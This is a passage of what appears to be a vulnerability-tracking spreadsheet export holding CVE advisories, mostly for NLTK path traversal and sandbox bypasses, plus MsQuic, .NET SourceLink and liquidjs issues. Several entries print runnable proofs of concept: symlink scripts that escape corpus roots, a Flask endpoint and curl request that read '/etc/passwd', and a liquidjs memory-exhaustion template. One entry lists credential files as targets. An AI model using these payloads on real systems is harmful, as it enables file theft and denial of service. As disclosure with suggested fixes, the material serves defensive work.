os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D9" s="5" t="inlineStr" /><c r="E9" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.006</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M9" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N9" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr" /><c r="S9" s="5" t="inlineStr"><is><t>This is a **new, distinct vulnerability**: a bypass of the fix already published as [GHSA-xh95-f55m-82fw](https://github.com/nltk/nltk/security/advisories/GHSA-xh95-f55m-82fw) ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.

## Summary

The original advisory was fixed (PR [#3581](https://github.com/nltk/nltk/pull/3581)) by adding `_reject_unsafe_path_component()`, which blocks literal `/`, `\`, `..`, and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through `self.abspath()` (`nltk/corpus/reader/api.py`, `self._root.join(fileid)`), which is a plain lexical join, not the symlink-resolving, `required_root`-scoped check that `CorpusReader.open()` (and `NKJPCorpusReader`'s own fix for its sibling advisory) correctly use elsewhere in this same codebase.

A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.

## Affected code (`nltk/corpus/reader/framenet.py`)

- `frame_by_name()` reads `&lt;frame_dir&gt;/&lt;name&gt;.xml`
- `_lu_file()` reads `&lt;lu_dir&gt;/lu&lt;id&gt;.xml`
- `doc()` reads `&lt;fulltext_dir&gt;/&lt;filename&gt;`

All three follow the same chain: `_reject_unsafe_path_component(value, ...)`, then `self.abspath(os.path.join(subdir, value))`, then `XMLCorpusView(...)`, opened via `PathPointer.open()` with no `required_root`.

## Proof of concept

Self-contained, runnable end to end.

```python
import os
import tempfile

from nltk.corpus.reader.framenet import FramenetCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)

with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
    f.write("&lt;frameRelations/&gt;")

secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write(
        '&lt;frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999"&gt;'
        "&lt;definition&gt;THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT&lt;/definition&gt;"
        "&lt;/frame&gt;"
    )

# Attacker plants this inside &lt;corpus_root&gt;/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)

reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}}  # skip unrelated index build

result = reader.frame_by_name("evil_link")   # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
```

Actual output when run against unpatched `main` (commit `35813c8`):

```
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
```

That content was read from `secret_path`, a file entirely outside `corpus_root`, via a single, unmodified, public API call. No exception is raised anywhere in the chain; `_reject_unsafe_path_component` passes because `"evil_link"` contains no separators, `..`, or drive prefix.

Verified the same way for the other two affected call sites, `_lu_file()` (`lu&lt;id&gt;.xml` symlink under `lu/`) and `doc()` (arbitrary filename symlink under `fulltext/`), both succeeding identically with no exception raised.
## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own `SECURITY.md` names "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call.
- Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the `nltk.pathsec` sandbox... including the strict `ENFORCE=True` mode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, since `abspath()` never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (`NKJPCorpusReader`).

## Suggested fix

Route all three call sites through `CorpusReader.open()` (or pass `required_root=self._root` to `validate_path()` directly, as `NKJPCorpusReader` already does), instead of `self.abspath()` plus raw `PathPointer.open()`.</t></is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D10" s="5" t="inlineStr" /><c r="E10" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.004</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M10" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N10" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr" /><c r="S10" s="5" t="inlineStr"><is><t>### Summary

Published `nltk==3.9.4` still contains several XML-reader entrypoints that build parser paths from caller-controlled selectors or trusted-looking index state without preserving the corpus-root boundary.

### Details

- **Vulnerability type:** Path traversal and trusted-root bypass
- **Affected component:** `FramenetCorpusReader.frame_by_name`, `FramenetCorpusReader.doc`, `FramenetCorpusReader.lu`, `NKJPCorpusReader.header`
- **Affected versions:** Published `3.9.4` reproduced. Current source `v3.10.0-rc2` acted as a negative control and blocked the same payloads.
- **Patched versions:** Patched in version 3.10.0, which includes the path-safety rejections seen in the release candidate.
- **Root cause:** Stable reader paths still construct raw XML filenames from unsafe selectors, poisoned index state, or unsafe file identifiers.

I confirmed four public stable entrypoints return parsed outside-root content: a parent-segment traversal frame name, a poisoned fulltext index filename, a poisoned LU id, and an unsafe NKJP header file identifier. Current source rejects the same payloads with explicit path-safety errors, which shows the bug is real but version-scoped to the published stable package.

### PoC

**Preconditions**
- The application exposes FrameNet or NKJP reader APIs while trusting NLTK to keep XML parsing inside a corpus root.

**Steps**
1. Create a minimal FrameNet or NKJP corpus root and place attacker-chosen XML files outside that root.
2. Feed unsafe selectors or poisoned index state into the relevant public stable `3.9.4` APIs.
3. Observe `frame_by_name`, `doc`, `lu(...).exemplars`, or `header` return parsed outside-root values.
4. Run the same payloads against current source and observe explicit path-safety rejections.

**Minimal reproducible excerpt**

```text
framenet_frame_definition FRAME_LEAK
framenet_doc_text DOC_LEAK
framenet_lu_text LU_LEAK
nkjp_header_title HEADER_LEAK
```

### Impact

Applications that process attacker-influenced FrameNet or NKJP corpus selectors or state can be made to parse XML outside the trusted corpus root through normal public reader responses.

### Remediation

Keep these reader paths on the same root-confinement model as `CorpusReader.open()` and `nltk.pathsec`. Reject unsafe path components before constructing filenames from frame names, document filenames, LU ids, or NKJP file identifiers.

### Resources

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1366-L1369
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1456-L1460
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1803-L1810
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L96-L103
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L251-L256
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/framenet.py#L1388-L1399
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/nkjp.py#L96-L128</t></is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D11" s="5" t="inlineStr" /><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.012</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M11" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N11" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr" /><c r="S11" s="5" t="inlineStr"><is><t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.

# Details

New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.

## Patches

- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)

# Impact

An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D12" s="5" t="inlineStr" /><c r="E12" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.005</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr" /><c r="L12" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M12" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N12" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr" /><c r="S12" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), you're exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
2. If your application references the vulnerable package, update the package reference to the patched version. You can list the versions you have installed by running the `dotnet --info` command.

Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.

Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If you have found a potential security issue in a supported version of .NET, please report it to the Microsoft Security Response Center (MSRC) via the [MSRC Researcher Portal](https://msrc.microsoft.com/report/vulnerability/new). Further information can be found in the MSRC [Report an Issue FAQ](https://www.microsoft.com/msrc/faqs-report-an-issue).

Security reports made through MSRC may qualify for the Microsoft .NET Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.

### Support

You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.

### Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

### External Links

[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D13" s="5" t="inlineStr" /><c r="E13" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.006</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr" /><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M13" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N13" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr" /><c r="S13" s="5" t="inlineStr"><is><t>## Summary
Setting `nltk.pathsec.ENFORCE = True` is documented to sandbox all file access to allowed NLTK data directories and raise `PermissionError` on unauthorized access. However, `StreamBackedCorpusView` opens files via `builtins.open()` directly, bypassing `pathsec.validate_path()` entirely. An attacker who can influence the `fileid` argument can read arbitrary local files regardless of the `ENFORCE` setting.

## Details
`nltk/pathsec.py:274` defines the enforcement point:
```python
def open(file, mode="r", **kwargs):
    validate_path(file, context="pathsec.open")
    return builtins.open(file, mode=mode, **kwargs)
```

`StreamBackedCorpusView._open()` in `nltk/corpus/reader/util.py` bypasses this entirely for string paths:

```python
# line 171 — no validate_path() call
self._eofpos = os.stat(self._fileid).st_size

# line 208 — calls builtins.open directly
self._stream = open(self._fileid, "rb")
```

Also affected: `XMLCorpusView` and any corpus reader subclass that passes a raw string `fileid` to `StreamBackedCorpusView`.

## PoC
```python
# poc_server.py — StreamBackedCorpusView pathsec.ENFORCE bypass
from flask import Flask, request, jsonify
import nltk.pathsec as ps
from nltk.corpus.reader.util import StreamBackedCorpusView, read_line_block

# Strict mode enabled — expected to sandbox all file access
ps.ENFORCE = True

app = Flask(__name__)

@app.post("/read")
def read_file():
    fname = request.json.get("file")
    # fileid is user-controlled, passed directly to StreamBackedCorpusView
    # pathsec.ENFORCE = True is ignored — builtins.open() called internally
    view = StreamBackedCorpusView(fname, read_line_block, encoding="utf8")
    return jsonify({"file": fname, "content": view[0]})

app.run(host="0.0.0.0", port=8000)
```
Trigger:
```
curl -s -X POST http://localhost:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "/etc/passwd"}'
```
Confirmed on latest stable NLTK. No privileges required.

## Impact
- **Type:** Arbitrary Local File Read / Security Control Bypass
- **CWE:** CWE-22, CWE-284
- **OWASP:** A01:2021 – Broken Access Control

Affects web apps, REST APIs, and multi-tenant NLP pipelines where user input influences the `fileid` passed to NLTK corpus readers. Sensitive targets include `/etc/passwd`, `/proc/self/environ` (may contain `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, etc.), and application config files.

The core issue is that operators who explicitly set `ENFORCE = True` to harden production deployments are left with a **false security guarantee**.

**Suggested fix:** Replace `builtins.open()` and `os.stat()` in the string-path branch with `nltk.pathsec.open()` and `nltk.pathsec.validate_path()`.</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D14" s="5" t="inlineStr" /><c r="E14" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.004</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr" /><c r="L14" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M14" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N14" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr" /><c r="S14" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D15" s="5" t="inlineStr" /><c r="E15" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.004</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M15" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N15" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr" /><c r="S15" s="5" t="inlineStr"><is><t>### Summary

The `join` filter (`src/filters/array.ts:8-13`) charges `memoryLimit` by array element **count**, not by the string length it produces, letting a template bypass a configured `memoryLimit` and allocate strings far past budget — bounded only by V8/process limits, not by `memoryLimit`.

### Details

```js
// src/filters/array.ts:8-13
export const join = argumentsToValue(function (this: FilterImpl, v: any[], arg: string) {
  const array = toArray(v)
  const sep = isNil(arg) ? ' ' : stringify(arg)
  const complexity = array.length * (1 + sep.length)   // element COUNT, not element sizes
  this.context.memoryLimit.use(complexity)
  return array.join(sep)                                // allocates sum(element lengths) + separators
})
```

`concat` (`array.ts:72`) is the enabler: it charges by element count too, but only copies references (cheap for both limiter and heap), so an array's element count can be doubled repeatedly at near-zero real cost. `join` is where the bug lives — it's the call that actually materializes all referenced content into one string, and its own charge (`array.length`) doesn't reflect that.

Same undercounting class as already-fixed `replace` (GHSA-mmg9-6m6j-jqqx), `replace_first` (GHSA-6q5m-63h6-5x4v), `date`/strftime (GHSA-hh27-hf48-9f5q) — `join` wasn't covered. Sibling `array_to_sentence_string` (`src/filters/string.ts:210`) has the identical defect.

### PoC

Live-reproduced against `liquidjs@10.27.1`, Node v24.3.0.

```javascript
const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e7 }); // 10M-unit DoS defense

const E = 5000, DOUBLINGS = 13;
const chunk = 'a'.repeat(E);
let tpl = `{%- assign s = "${chunk}" -%}{%- assign a = s | split: "NOSUCHSEP" -%}`;
for (let i = 0; i &lt; DOUBLINGS; i++) tpl += `{%- assign a = a | concat: a -%}`; // 1 -&gt; 8192 elements
tpl += `{%- assign out = a | join: "" -%}{{ out | size }}`;

const len = Number(engine.renderSync(engine.parse(tpl))); // succeeds — should be blocked
console.log('output length:', len);  // output length: 40960000
```

Verified by binary-search on `memoryLimit`: render is **blocked at 29573**, **succeeds at 29574** — confirming total charge across `split`+13×`concat`+`join` is exactly 29,574 units (split 5000, concat 16382, join 8192). Output length: **40,960,000** — **1385x** the total charged, &gt;4x the configured 10,000,000-unit limit. Scaling `DOUBLINGS` grows output exponentially for linear charge growth, driving toward gigabytes and a `RangeError: Invalid string length` / V8 OOM crash.

### Impact

